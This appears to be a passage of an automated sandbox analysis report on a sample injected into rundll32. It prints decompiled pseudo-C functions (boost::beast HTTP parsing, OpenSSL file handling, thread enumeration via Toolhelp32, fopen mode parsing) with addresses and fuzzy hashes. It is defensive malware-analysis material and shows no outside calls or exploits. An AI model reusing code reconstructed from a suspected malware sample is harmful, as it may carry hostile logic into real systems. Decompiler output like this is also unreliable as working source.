                                        0x21ef2ff313d
                                        0x21ef2ff3142
                                        0x21ef2ff3144
                                        0x21ef2ff314c
                                        0x21ef2ff314f
                                        0x21ef2ff3153
                                        0x21ef2ff3157
                                        0x21ef2ff316c

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$Init_thread_footerconnectgetsockopt
                                        • String ID:
                                        • API String ID: 1723522097-0
                                        • Opcode ID: cf31bf95f18af37386febb36bc9668673220a96959e16307ef7f0ed0195419d3
                                        • Instruction ID: b5424a2131182549d4847ed1de8a6b08b567b931801899efa0dfbb23d80a1a2d
                                        • Opcode Fuzzy Hash: cf31bf95f18af37386febb36bc9668673220a96959e16307ef7f0ed0195419d3
                                        • Instruction Fuzzy Hash: 0F416072E00B818AFB109F74EC482ED66B0B765768F028715DEA926FD5DB3C81D68340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3008100 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 324COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 42%
                                        			E0000021E21EF3008100(void* __ebx, void* __edx, long long __rbx, long long __rcx, signed char** __rdx, long long __rsi, signed char* __r8, signed char* _a16, void* _a40, signed char** _a48, intOrPtr* _a56) {
				void* _v40;
				char _v104;
				char _v168;
				char _v256;
				char _v272;
				char _v280;
				signed char* _v288;
				long long _v296;
				char _v304;
				char _v312;
				signed char* _v320;
				signed char* _v328;
				signed char* _v336;
				signed char* _v344;
				signed char* _v352;
				signed char* _v360;
				signed char* _v368;
				signed char* _v376;
				void* __rdi;
				signed int _t92;
				signed int _t101;
				signed int _t104;
				signed int _t112;
				void* _t115;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				signed char* _t160;
				signed char* _t161;
				signed char* _t166;
				signed char* _t169;
				signed char* _t170;
				signed char* _t181;
				signed char* _t182;
				signed char* _t185;
				signed char* _t186;
				signed char* _t187;
				signed char** _t188;
				signed char* _t193;
				signed char* _t194;
				signed char* _t197;
				char* _t205;
				signed char* _t208;
				signed char* _t211;
				void* _t221;
				void* _t222;
				signed char* _t223;
				signed char* _t224;
				intOrPtr* _t227;
				void* _t229;
				signed char* _t230;
				signed char* _t234;
				void* _t238;
				signed char* _t239;
				signed char* _t240;
				signed char* _t242;
				signed char* _t243;
				void* _t245;
				signed char* _t248;
				void* _t250;
				void* _t251;
				void* _t254;
				signed char* _t255;

				_t116 = __ebx;
				_t160 = _t230;
				 *((long long*)(_t160 + 8)) = __rcx;
				 *((long long*)(_t160 - 0x108)) = 0xfffffffe;
				 *((long long*)(_t160 + 0x18)) = __rbx;
				 *((long long*)(_t160 + 0x20)) = __rsi;
				_t255 = __r8;
				_t234 =  *__rdx;
				 *__rdx = _t234;
				 *((char*)(_t160 + 8)) = 0;
				if (_t234 - __r8 < 0) goto 0xf300815b;
				E0000021E21EF2FF0490(__rcx, __rdx);
				_v376 = 3;
				_v368 = _t160;
				asm("movups xmm0, [esp+0x20]");
				goto 0xf300861a;
				asm("o16 nop [eax+eax]");
				_t193 =  *__rdx;
				if (( *_t193 & 0x000000ff) != 0x3a) goto 0xf30085da;
				if (_t193 != _t234) goto 0xf30081a0;
				E0000021E21EF2FF0490(_t193, 0xf31b4a90);
				_v376 = 0x11;
				_v368 = _t160;
				asm("movups xmm0, [esp+0x20]");
				goto 0xf300861a;
				_v376 = _t234;
				_t194 = _t193 - _t234;
				_v368 = _t194;
				asm("movups xmm0, [esp+0x20]");
				asm("inc ecx");
				 *__rdx =  &(( *__rdx)[1]);
				_t185 =  *__rdx;
				r13d = 0;
				r14d = r13d;
				_t227 = _a56;
				_t161 =  &(_t185[1]);
				if (_t161 - __r8 <= 0) goto 0xf30081f8;
				E0000021E21EF2FF0490(_t194, 0xf31b4a90);
				_v376 = 3;
				_v368 = _t161;
				asm("movups xmm0, [esp+0x20]");
				asm("movups [esi], xmm0");
				goto 0xf3008625;
				_t92 =  *_t185 & 0x000000ff;
				if (_t92 == 0x20) goto 0xf30085ce;
				if (_t92 == 9) goto 0xf30085ce;
				_t223 = _t185;
				if (_t185 - __r8 < 0) goto 0xf3008234;
				E0000021E21EF2FF0490(_t194, 0xf31b4a90);
				_v376 = 3;
				_v368 = _t161;
				asm("movups xmm0, [esp+0x20]");
				asm("movups [esi], xmm0");
				goto 0xf30082b2;
				_t117 =  *_t185 & 0x000000ff;
				if (_t194 - 0x20 - 0x5f < 0) goto 0xf30085c6;
				if (_t117 - 0x20 >= 0) goto 0xf300824c;
				if (_t117 != 9) goto 0xf3008255;
				if (_t117 != 0x7f) goto 0xf30085c6;
				if (_t117 != 0xd) goto 0xf30082af;
				_t186 =  &(_t185[1]);
				if (_t186 - __r8 < 0) goto 0xf3008281;
				E0000021E21EF2FF0490(_t194, 0xf31b4a90);
				_v328 = 3;
				_v320 = _t185;
				asm("movups xmm0, [esp+0x50]");
				asm("movups [esi], xmm0");
				goto 0xf30082b2;
				if ( *_t186 == 0xa) goto 0xf30082a5;
				E0000021E21EF2FF0490(_t194, 0xf31b4a90);
				_v360 = 0xb;
				_v352 = __r8;
				asm("movups xmm0, [esp+0x30]");
				asm("movups [esi], xmm0");
				goto 0xf30082b2;
				_t251 = _t186 - 1;
				goto 0xf30082b2;
				_t166 = _t248;
				 *__rdx = _t166;
				if ( *_t227 != r13d) goto 0xf3008625;
				if (_t166 != 0) goto 0xf30082e3;
				E0000021E21EF2FF0490(_t194, 0xf31b4a90);
				_v360 = 0x12;
				_v352 = _t166;
				asm("movups xmm0, [esp+0x30]");
				asm("movups [esi], xmm0");
				goto 0xf3008625;
				_t187 =  &(_t166[1]);
				if (_t187 - __r8 <= 0) goto 0xf300830b;
				E0000021E21EF2FF0490(_t194, 0xf31b4a90);
				_v360 = 3;
				_v352 = _t166;
				asm("movups xmm0, [esp+0x30]");
				asm("movups [esi], xmm0");
				goto 0xf3008625;
				_t238 = _t251;
				if (_t251 == _t223) goto 0xf300832c;
				_t30 = _t238 - 1; // -1
				_t211 = _t30;
				_t118 =  *_t211 & 0x000000ff;
				if (_t118 == 0x20) goto 0xf3008324;
				if (_t118 != 9) goto 0xf300832c;
				_t239 = _t211;
				if (_t211 != _t223) goto 0xf3008313;
				_a16 = _t239;
				_t119 =  *_t166 & 0x000000ff;
				if (_t119 == 0x20) goto 0xf3008363;
				if (_t119 == 9) goto 0xf3008363;
				_v360 = _t223;
				_t240 = _t239 - _t223;
				_v352 = _t240;
				asm("movups xmm0, [esp+0x30]");
				goto 0xf3008622;
				 *__rdx = _t187;
				if (_t240 == _t223) goto 0xf30081d0;
				_t188 = _a48;
				 *_t188 = _t248;
				_t188[1] = r13b;
				E0000021E21EF300B6D0(__ebx, _t188, _t188,  &(_t188[1]) + _t248, _t223, _t227, _t229, _t223, _t240);
				_t169 =  &(( *__rdx)[1]);
				if (_t169 - __r8 <= 0) goto 0xf30083bd;
				E0000021E21EF2FF0490(_t188,  &(_t188[1]) + _t248);
				_v360 = 3;
				_v352 = _t169;
				asm("movups xmm0, [esp+0x30]");
				asm("movups [esi], xmm0");
				goto 0xf3008625;
				_t224 =  *__rdx;
				_t101 =  *_t224 & 0x000000ff;
				if (_t101 == 0x20) goto 0xf30085b7;
				if (_t101 == 9) goto 0xf30085b7;
				0xf2ff2bc0(_t250, _t248, _t245, _t222);
				 *__rdx = _t169;
				if ( *_t227 != 0) goto 0xf3008625;
				if (_t169 != 0) goto 0xf300841b;
				E0000021E21EF2FF0490(_t224, __r8);
				_v328 = 0x12;
				_v320 = _t169;
				asm("movups xmm0, [esp+0x50]");
				asm("movups [esi], xmm0");
				goto 0xf3008625;
				_t170 =  &(_t169[1]);
				if (_t170 - __r8 <= 0) goto 0xf3008442;
				E0000021E21EF2FF0490(_t224, __r8);
				_v376 = 3;
				_v368 = _t170;
				asm("movups xmm0, [esp+0x20]");
				asm("movups [esi], xmm0");
				goto 0xf3008625;
				_t242 = _a16;
				_v288 = _t242;
				if (_t242 == _t224) goto 0xf300846e;
				_t197 = _t242 - 1;
				_t104 =  *_t197 & 0x000000ff;
				if (_t104 == 0x20) goto 0xf3008464;
				if (_t104 != 9) goto 0xf300846e;
				_t243 = _t197;
				_v288 = _t197;
				goto 0xf3008450;
				_a16 = _t243;
				if (_t224 == _t243) goto 0xf3008578;
				if ( *_t188 - 0x1000 < 0) goto 0xf300854f;
				_v312 = 0xf319d200;
				_v304 = 0xf319d200;
				_v296 = 0xf319d200;
				_v280 = "size() >= max_size()";
				_v272 = 1;
				E0000021E21EF310E0E4(_t188,  &_v280,  &_v304, _t224, _t227);
				_v312 = 0xf319d240;
				_v312 = 0xf319d270;
				E0000021E21EF2FFE350(_t188,  &_v168,  &_v312);
				 *0x21EF319D298 = "void __cdecl boost::beast::static_string<4096,char,struct std::char_traits<char> >::push_back(char)";
				 *0x21EF319D2A0 = "D:\\Sources\\boost_1_68_0\\boost/beast/core/impl/static_string.ipp";
				 *0x21EF319D2A8 = 0x19c;
				E0000021E21EF30012E0(0xf319d270,  &_v104);
				E0000021E21EF3001320(_t116, _t188,  &_v256, 0xf319d270, _t227);
				_t205 =  &_v256;
				E0000021E21EF31103EC(_t188, _t205, 0xf31e4b98, _t227, _t254);
				 *_t188 = _t205 + 1;
				 *((char*)(_t205 +  &(_t188[1]))) = 0x20;
				( *_t188)[ &(_t188[1])] = 0;
				_t221 =  &(_t188[1]) +  *_t188;
				E0000021E21EF300B6D0(_t116, _t188, _t188, _t221, _t224, _t227, _t229, _t224, _t243);
				_t112 =  *( *__rdx) & 0x000000ff;
				if (_t112 == 0x20) goto 0xf30085aa;
				if (_t112 == 9) goto 0xf30085aa;
				_t208 =  *_t188;
				_v344 =  &(_t188[1]);
				_v336 = _t208;
				asm("movups xmm0, [esp+0x40]");
				asm("movups [eax], xmm0");
				goto 0xf3008625;
				 *__rdx = _t208 + 1;
				goto 0xf3008392;
				_t181 =  &(_t224[1]);
				 *__rdx = _t181;
				goto 0xf3008625;
				goto 0xf3008210;
				 *__rdx =  &(_t188[0]);
				goto 0xf30081d0;
				if (_t181[_t221] != 0) goto 0xf30085f2;
				E0000021E21EF2FF0490(_t208, _t221);
				_v344 = 0x11;
				goto 0xf3008610;
				_t182 = _t208 + 1;
				 *__rdx = _t182;
				if (_t182 - _t255 < 0) goto 0xf3008170;
				_t115 = E0000021E21EF2FF0490(_t208, _t221);
				_v344 = 3;
				_v336 = _t182;
				asm("movups xmm0, [esp+0x40]");
				asm("movups [eax], xmm0");
				return _t115;
			}


































































                                        0x21ef3008100
                                        0x21ef3008100
                                        0x21ef3008103
                                        0x21ef3008117
                                        0x21ef3008122
                                        0x21ef3008126
                                        0x21ef300812a
                                        0x21ef3008130
                                        0x21ef3008133
                                        0x21ef3008136
                                        0x21ef300813d
                                        0x21ef300813f
                                        0x21ef3008144
                                        0x21ef300814c
                                        0x21ef3008151
                                        0x21ef3008156
                                        0x21ef3008166
                                        0x21ef3008170
                                        0x21ef3008179
                                        0x21ef3008182
                                        0x21ef3008184
                                        0x21ef3008189
                                        0x21ef3008191
                                        0x21ef3008196
                                        0x21ef300819b
                                        0x21ef30081a0
                                        0x21ef30081a5
                                        0x21ef30081a8
                                        0x21ef30081ad
                                        0x21ef30081b2
                                        0x21ef30081b6
                                        0x21ef30081ba
                                        0x21ef30081be
                                        0x21ef30081c1
                                        0x21ef30081c4
                                        0x21ef30081d0
                                        0x21ef30081d7
                                        0x21ef30081d9
                                        0x21ef30081de
                                        0x21ef30081e6
                                        0x21ef30081eb
                                        0x21ef30081f0
                                        0x21ef30081f3
                                        0x21ef30081f8
                                        0x21ef30081fd
                                        0x21ef3008205
                                        0x21ef300820b
                                        0x21ef3008213
                                        0x21ef3008215
                                        0x21ef300821a
                                        0x21ef3008222
                                        0x21ef3008227
                                        0x21ef300822c
                                        0x21ef3008232
                                        0x21ef3008234
                                        0x21ef300823c
                                        0x21ef3008245
                                        0x21ef300824a
                                        0x21ef300824f
                                        0x21ef3008258
                                        0x21ef300825a
                                        0x21ef3008260
                                        0x21ef3008262
                                        0x21ef3008267
                                        0x21ef300826f
                                        0x21ef3008274
                                        0x21ef3008279
                                        0x21ef300827f
                                        0x21ef3008284
                                        0x21ef3008286
                                        0x21ef300828b
                                        0x21ef3008293
                                        0x21ef3008298
                                        0x21ef300829d
                                        0x21ef30082a3
                                        0x21ef30082a5
                                        0x21ef30082ad
                                        0x21ef30082af
                                        0x21ef30082b2
                                        0x21ef30082b9
                                        0x21ef30082c2
                                        0x21ef30082c4
                                        0x21ef30082c9
                                        0x21ef30082d1
                                        0x21ef30082d6
                                        0x21ef30082db
                                        0x21ef30082de
                                        0x21ef30082e3
                                        0x21ef30082ea
                                        0x21ef30082ec
                                        0x21ef30082f1
                                        0x21ef30082f9
                                        0x21ef30082fe
                                        0x21ef3008303
                                        0x21ef3008306
                                        0x21ef300830b
                                        0x21ef3008311
                                        0x21ef3008313
                                        0x21ef3008313
                                        0x21ef3008317
                                        0x21ef300831d
                                        0x21ef3008322
                                        0x21ef3008324
                                        0x21ef300832a
                                        0x21ef300832f
                                        0x21ef3008337
                                        0x21ef300833d
                                        0x21ef3008342
                                        0x21ef3008344
                                        0x21ef3008349
                                        0x21ef300834c
                                        0x21ef3008359
                                        0x21ef300835e
                                        0x21ef3008363
                                        0x21ef300836a
                                        0x21ef3008370
                                        0x21ef3008378
                                        0x21ef300837b
                                        0x21ef300838c
                                        0x21ef3008396
                                        0x21ef300839c
                                        0x21ef300839e
                                        0x21ef30083a3
                                        0x21ef30083ab
                                        0x21ef30083b0
                                        0x21ef30083b5
                                        0x21ef30083b8
                                        0x21ef30083bd
                                        0x21ef30083c1
                                        0x21ef30083c6
                                        0x21ef30083ce
                                        0x21ef30083e5
                                        0x21ef30083ea
                                        0x21ef30083f1
                                        0x21ef30083fa
                                        0x21ef30083fc
                                        0x21ef3008401
                                        0x21ef3008409
                                        0x21ef300840e
                                        0x21ef3008413
                                        0x21ef3008416
                                        0x21ef300841b
                                        0x21ef3008421
                                        0x21ef3008423
                                        0x21ef3008428
                                        0x21ef3008430
                                        0x21ef3008435
                                        0x21ef300843a
                                        0x21ef300843d
                                        0x21ef3008442
                                        0x21ef300844a
                                        0x21ef3008453
                                        0x21ef3008455
                                        0x21ef3008459
                                        0x21ef300845e
                                        0x21ef3008462
                                        0x21ef3008464
                                        0x21ef3008467
                                        0x21ef300846c
                                        0x21ef300846e
                                        0x21ef3008479
                                        0x21ef3008489
                                        0x21ef3008496
                                        0x21ef300849d
                                        0x21ef30084a2
                                        0x21ef30084ae
                                        0x21ef30084b6
                                        0x21ef30084cb
                                        0x21ef30084d8
                                        0x21ef30084e4
                                        0x21ef30084f6
                                        0x21ef3008503
                                        0x21ef300850e
                                        0x21ef3008512
                                        0x21ef3008524
                                        0x21ef3008535
                                        0x21ef3008541
                                        0x21ef3008549
                                        0x21ef3008553
                                        0x21ef3008556
                                        0x21ef300855e
                                        0x21ef300856a
                                        0x21ef3008573
                                        0x21ef300857c
                                        0x21ef3008581
                                        0x21ef3008585
                                        0x21ef300858b
                                        0x21ef300858e
                                        0x21ef3008593
                                        0x21ef30085a0
                                        0x21ef30085a5
                                        0x21ef30085a8
                                        0x21ef30085ae
                                        0x21ef30085b2
                                        0x21ef30085b7
                                        0x21ef30085bb
                                        0x21ef30085c4
                                        0x21ef30085c9
                                        0x21ef30085d1
                                        0x21ef30085d5
                                        0x21ef30085e1
                                        0x21ef30085e3
                                        0x21ef30085e8
                                        0x21ef30085f0
                                        0x21ef30085f2
                                        0x21ef30085f6
                                        0x21ef30085fd
                                        0x21ef3008603
                                        0x21ef3008608
                                        0x21ef3008610
                                        0x21ef3008615
                                        0x21ef3008622
                                        0x21ef3008641

                                        Strings
                                        • void __cdecl boost::beast::static_string<4096,char,struct std::char_traits<char> >::push_back(char), xrefs: 0000021EF30084FC
                                        • D:\Sources\boost_1_68_0\boost/beast/core/impl/static_string.ipp, xrefs: 0000021EF3008507
                                        • size() >= max_size(), xrefs: 0000021EF30084A7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Init_thread_footer
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/core/impl/static_string.ipp$size() >= max_size()$void __cdecl boost::beast::static_string<4096,char,struct std::char_traits<char> >::push_back(char)
                                        • API String ID: 1385522511-3544853855
                                        • Opcode ID: e0ac55e2f2fdeba2ef60c2dc1925d4f5d3a0ea4012792497275840d9e442e911
                                        • Instruction ID: 144b120321d51fa5ad88ba0551f6fe6215e9a09910b7261936013ae5e7f96f8e
                                        • Opcode Fuzzy Hash: e0ac55e2f2fdeba2ef60c2dc1925d4f5d3a0ea4012792497275840d9e442e911
                                        • Instruction Fuzzy Hash: 4FE1B272509B8485EF618F14E8487DEB7A2F3A4748F569212EFC902B99EB7CC1D6C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF30332D8 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 66stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 23%
                                        			E0000021E21EF30332D8(void* __rax, long long __rbx, void* __rdx, void* __rsi, void* __rbp, long long _a32, long long _a40, void* _a64, void* _a72, void* _a80) {
				long _t15;
				void* _t34;
				intOrPtr* _t44;
				long long _t46;
				char* _t55;
				void* _t60;

				_t60 = __rbp;
				_t58 = __rsi;
				_t46 = __rbx;
				_t49 = __rbx;
				strchr(??, ??);
				_t36 =  ==  ? 0x11 : 1;
				if (__rax != 0) goto 0xf3033396;
				_t15 = GetLastError();
				_a32 = 0x4a;
				r8d = _t15;
				E0000021E21EF30222D0(__rax + 2, __rax + 1, __rax, __rax, __rbx, __rbx, __rdx, __rsi, __rbp, "..\\..\\openssl-1.1.0f\\crypto\\bio\\bss_file.c");
				_t44 = "\')";
				_a40 = _t44;
				_t55 = "fopen(\'";
				_a32 = _t46;
				E0000021E21EF3021640(__rax + 5, _t44, _t55, _t60, "\',\'");
				E0000021E21EF3118984(_t44);
				if ( *_t44 == 2) goto 0xf3033370;
				E0000021E21EF3118984(_t44);
				if ( *_t44 == 6) goto 0xf3033370;
				_a32 = 0x53;
				r8d = __rax + 2;
				goto 0xf303337e;
				_a32 = 0x51;
				r8d = 0x80;
				_t10 = _t55 - 0x4d; // 0x20
				E0000021E21EF30222D0(_t10, 0x6d,  *_t44 - 6, _t44, _t46, _t49, _t55, _t58, _t60, "..\\..\\openssl-1.1.0f\\crypto\\bio\\bss_file.c");
				goto 0xf30333d6;
				E0000021E21EF3023030(_t44, _t46, 0xf315cca0);
				if (_t44 != 0) goto 0xf30333b6;
				E0000021E21EF3117798(0x6d, _t34, _t44, _t44, __rax);
				goto 0xf30333d6;
				0xf3022a70();
				r8d =  ==  ? 0x11 : 1;
				0xf3022aa0();
				return 0;
			}









                                        0x21ef30332d8
                                        0x21ef30332d8
                                        0x21ef30332d8
                                        0x21ef30332dd
                                        0x21ef30332e3
                                        0x21ef30332f5
                                        0x21ef30332fb
                                        0x21ef3033301
                                        0x21ef303330e
                                        0x21ef3033316
                                        0x21ef303331f
                                        0x21ef3033324
                                        0x21ef303332e
                                        0x21ef303333a
                                        0x21ef3033341
                                        0x21ef3033349
                                        0x21ef303334e
                                        0x21ef3033356
                                        0x21ef3033358
                                        0x21ef3033360
                                        0x21ef3033362
                                        0x21ef303336a
                                        0x21ef303336e
                                        0x21ef3033370
                                        0x21ef3033378
                                        0x21ef303338a
                                        0x21ef303338d
                                        0x21ef3033394
                                        0x21ef303339d
                                        0x21ef30333a8
                                        0x21ef30333ad
                                        0x21ef30333b4
                                        0x21ef30333bb
                                        0x21ef30333c3
                                        0x21ef30333ce
                                        0x21ef30333ea

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLaststrchr
                                        • String ID: ','$..\..\openssl-1.1.0f\crypto\bio\bss_file.c$Q$fopen('
                                        • API String ID: 4018447694-1229236475
                                        • Opcode ID: 020d1dfc1e2ef17f62ad4cf4ca80e5ab8ee7d06710a18e076b85718d48a1ba57
                                        • Instruction ID: 7dc2e5cfdd7558c661188f1ca769d8863a6e631a8647ef546dcc1c8a364cf96e
                                        • Opcode Fuzzy Hash: 020d1dfc1e2ef17f62ad4cf4ca80e5ab8ee7d06710a18e076b85718d48a1ba57
                                        • Instruction Fuzzy Hash: F921CC3230460586EE64AF11DC493DBB3A1F7A5B80F4A81269E4D03F96EF3DD906CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3017F50 Relevance: 9.1, APIs: 6, Instructions: 65threadprocessCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateOpenThread32$CloseFirstHandleInstanceNextProcessSnapshotThreadToolhelp32
                                        • String ID:
                                        • API String ID: 684471368-0
                                        • Opcode ID: 4619a8d8edc4ac160eccb4117f5135ab4275e03fabb9f83d5719aa648d199cb1
                                        • Instruction ID: a1ce3a5063789d6d5c894ee21f5838a25d2996a457d0560f23ce051d1e02ff82
                                        • Opcode Fuzzy Hash: 4619a8d8edc4ac160eccb4117f5135ab4275e03fabb9f83d5719aa648d199cb1
                                        • Instruction Fuzzy Hash: C1216032614B448AEB50DF22E84869FB7A5F799F80F0A4025EE8947F5ADF3CD552CB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF312BA24 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 205COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 87%
                                        			E0000021E21EF312BA24(long long __rbx, signed int* __rcx, intOrPtr* __rdx, signed int __rsi, long long __rbp, void* _a8, void* _a16, void* _a24) {
				signed int _t29;
				signed int _t32;
				void* _t46;
				signed int _t49;
				void* _t54;
				signed int _t65;
				void* _t72;
				signed int _t78;
				signed int _t83;
				void* _t98;
				signed short* _t103;
				signed short* _t104;
				signed short* _t106;
				signed short* _t108;
				signed short* _t109;
				signed short* _t110;
				signed short* _t111;
				signed int* _t115;
				void* _t132;
				void* _t135;

				_t115 = __rcx;
				_t98 = _t132;
				 *((long long*)(_t98 + 8)) = __rbx;
				 *((long long*)(_t98 + 0x10)) = __rbp;
				 *((long long*)(_t98 + 0x18)) = __rsi;
				 *((long long*)(_t98 - 0x18)) = __rcx;
				asm("movsd xmm0, [eax-0x18]");
				asm("movsd [edi], xmm0");
				_t5 =  &(_t115[8]); // 0x20
				_t65 = _t5;
				__rcx[2] = 0;
				__rcx[1] =  *0xf320b288;
				if ( *__rdx != _t65) goto 0xf312ba6a;
				_t103 = __rdx + 2;
				if ( *_t103 == _t65) goto 0xf312ba61;
				_t29 =  *_t103 & 0x0000ffff;
				if (_t29 == 0x61) goto 0xf312ba95;
				if (_t29 == 0x72) goto 0xf312ba8a;
				if (_t29 != 0x77) goto 0xf312bcbd;
				 *__rcx = 0x301;
				goto 0xf312ba9b;
				 *__rcx = 0;
				__rcx[1] = 1;
				goto 0xf312baa2;
				 *__rcx = 0x109;
				__rcx[1] = 2;
				_t104 =  &(_t103[1]);
				r8b = sil;
				r11b = sil;
				r9b = sil;
				r10b = sil;
				if ( *_t104 == 0) goto 0xf312bbe2;
				_t49 =  *_t104 & 0x0000ffff;
				_t72 = _t49 - 0x53;
				if (_t72 > 0) goto 0xf312bb60;
				if (_t72 == 0) goto 0xf312bb51;
				if (_t72 == 0) goto 0xf312bbce;
				if (_t72 == 0) goto 0xf312bb25;
				if (_t72 == 0) goto 0xf312bb1d;
				if (_t72 == 0) goto 0xf312bb0b;
				_t54 = _t49 - _t65 - 0xffffffffffffffe8;
				if (_t72 == 0) goto 0xf312bb02;
				if (_t54 != 4) goto 0xf312bcbd;
				if (r9b != 0) goto 0xf312bbc1;
				 *__rcx =  *__rcx | 0x00000010;
				goto 0xf312bb58;
				asm("bts dword [edi], 0x7");
				goto 0xf312bbcc;
				if (( *__rcx & 0x00000040) != 0) goto 0xf312bbc1;
				goto 0xf312bbca;
				r10b = 1;
				goto 0xf312bbc1;
				if (r11b != 0) goto 0xf312bbc1;
				_t32 =  *__rcx;
				r11b = 1;
				if ((_t32 & 0x00000002) != 0) goto 0xf312bbc1;
				 *__rcx = _t32 & 0xfffffffe | 0x00000002;
				__rcx[1] = __rcx[1] & 0xfffffffc | 0x00000004;
				goto 0xf312bbcc;
				_t78 = r9b;
				if (_t78 != 0) goto 0xf312bbc1;
				 *__rcx =  *__rcx | _t65;
				r9b = 1;
				goto 0xf312bbce;
				if (_t78 == 0) goto 0xf312bbb9;
				if (_t78 == 0) goto 0xf312bbaa;
				if (_t78 == 0) goto 0xf312bb98;
				if (_t78 == 0) goto 0xf312bb8c;
				if (_t54 - 0x3a != 6) goto 0xf312bcbd;
				if (( *__rcx & 0x0000c000) != 0) goto 0xf312bbc1;
				asm("bts eax, 0xe");
				goto 0xf312bbca;
				if (r8b != 0) goto 0xf312bbc1;
				asm("btr dword [edi+0x4], 0xb");
				goto 0xf312bba2;
				if (r8b != 0) goto 0xf312bbc1;
				asm("bts dword [edi+0x4], 0xb");
				r8b = 1;
				goto 0xf312bbce;
				_t83 =  *__rcx & 0x0000c000;
				if (_t83 != 0) goto 0xf312bbc1;
				asm("bts eax, 0xf");
				goto 0xf312bbca;
				asm("bt eax, 0xc");
				if (_t83 >= 0) goto 0xf312bbc6;
				goto 0xf312bbce;
				asm("bts eax, 0xc");
				if (1 != 0) goto 0xf312bab4;
				if (r10b == 0) goto 0xf312bbeb;
				_t106 =  &(( &(_t104[__rsi]))[1]);
				if ( *_t106 == _t65) goto 0xf312bbe7;
				if (r10b != 0) goto 0xf312bc07;
				if ( *_t106 != 0) goto 0xf312bcbd;
				__rcx[2] = 1;
				goto 0xf312bccd;
				r8d = 3;
				if (E0000021E21EF312D978(_t135) != 0) goto 0xf312bcbd;
				goto 0xf312bc2e;
				_t108 =  &(_t106[4]);
				if ( *_t108 == _t65) goto 0xf312bc2a;
				if ( *_t108 != 0x3d) goto 0xf312bcbd;
				_t109 =  &(_t108[1]);
				if ( *_t109 == _t65) goto 0xf312bc3d;
				r8d = 5;
				if (E0000021E21EF31341D4(1, __rsi, _t109, _t135) != 0) goto 0xf312bc69;
				_t110 =  &(_t109[5]);
				asm("bts dword [edi], 0x12");
				goto 0xf312bcb3;
				r8d = 8;
				if (E0000021E21EF31341D4(1, __rsi, _t110, _t135) != 0) goto 0xf312bc8c;
				_t111 =  &(_t110[8]);
				asm("bts dword [edi], 0x11");
				goto 0xf312bcb3;
				r8d = 7;
				if (E0000021E21EF31341D4(1, __rsi, _t111, _t135) != 0) goto 0xf312bcbd;
				asm("bts dword [edi], 0x10");
				goto 0xf312bcb3;
				if (_t111[8] == _t65) goto 0xf312bcaf;
				goto 0xf312bbf5;
				_t46 = E0000021E21EF3118984(__rsi);
				 *__rsi = 0x16;
				return E0000021E21EF3111BC8(_t46);
			}























                                        0x21ef312ba24
                                        0x21ef312ba24
                                        0x21ef312ba27
                                        0x21ef312ba2b
                                        0x21ef312ba2f
                                        0x21ef312ba40
                                        0x21ef312ba44
                                        0x21ef312ba4f
                                        0x21ef312ba53
                                        0x21ef312ba53
                                        0x21ef312ba56
                                        0x21ef312ba59
                                        0x21ef312ba5f
                                        0x21ef312ba61
                                        0x21ef312ba68
                                        0x21ef312ba6a
                                        0x21ef312ba72
                                        0x21ef312ba77
                                        0x21ef312ba7c
                                        0x21ef312ba82
                                        0x21ef312ba88
                                        0x21ef312ba8a
                                        0x21ef312ba8c
                                        0x21ef312ba93
                                        0x21ef312ba95
                                        0x21ef312ba9b
                                        0x21ef312baa2
                                        0x21ef312baa6
                                        0x21ef312baa9
                                        0x21ef312baac
                                        0x21ef312baaf
                                        0x21ef312bab7
                                        0x21ef312babd
                                        0x21ef312bac0
                                        0x21ef312bac3
                                        0x21ef312bac9
                                        0x21ef312bad1
                                        0x21ef312bada
                                        0x21ef312badf
                                        0x21ef312bae4
                                        0x21ef312bae6
                                        0x21ef312bae9
                                        0x21ef312baee
                                        0x21ef312baf7
                                        0x21ef312bafd
                                        0x21ef312bb00
                                        0x21ef312bb02
                                        0x21ef312bb06
                                        0x21ef312bb0f
                                        0x21ef312bb18
                                        0x21ef312bb1d
                                        0x21ef312bb20
                                        0x21ef312bb28
                                        0x21ef312bb2e
                                        0x21ef312bb30
                                        0x21ef312bb35
                                        0x21ef312bb41
                                        0x21ef312bb4c
                                        0x21ef312bb4f
                                        0x21ef312bb51
                                        0x21ef312bb54
                                        0x21ef312bb56
                                        0x21ef312bb58
                                        0x21ef312bb5e
                                        0x21ef312bb63
                                        0x21ef312bb68
                                        0x21ef312bb6d
                                        0x21ef312bb72
                                        0x21ef312bb77
